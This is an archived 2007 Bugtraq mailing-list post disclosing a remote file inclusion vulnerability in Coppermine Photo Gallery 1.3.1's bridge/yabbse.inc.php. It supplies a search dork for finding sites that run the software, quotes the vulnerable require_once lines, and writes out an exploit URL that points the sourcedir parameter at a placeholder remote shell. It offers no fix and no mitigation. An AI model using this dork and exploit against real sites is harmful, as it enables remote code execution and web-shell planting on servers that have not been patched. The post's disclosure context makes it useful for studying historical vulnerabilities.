Bugtraq mailing list archives

Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

From: master-of-desastor () hotmail com
Date: 7 Aug 2007 03:23:04 -0000

Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability

DoRk:"Powered by Coppermine Photo Gallery"
Vuln. code: 
require_once("$sourcedir/Load.php");require_once("$sourcedir/Security.php");
Exploit:
www.server.com/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL]
Author:Ma$tEr-0F-De$a$t0r

Current thread:

Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability master-of-desastor (Aug 08)
- <Possible follow-ups>
- Re: Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability laurent . gaffie (Aug 10)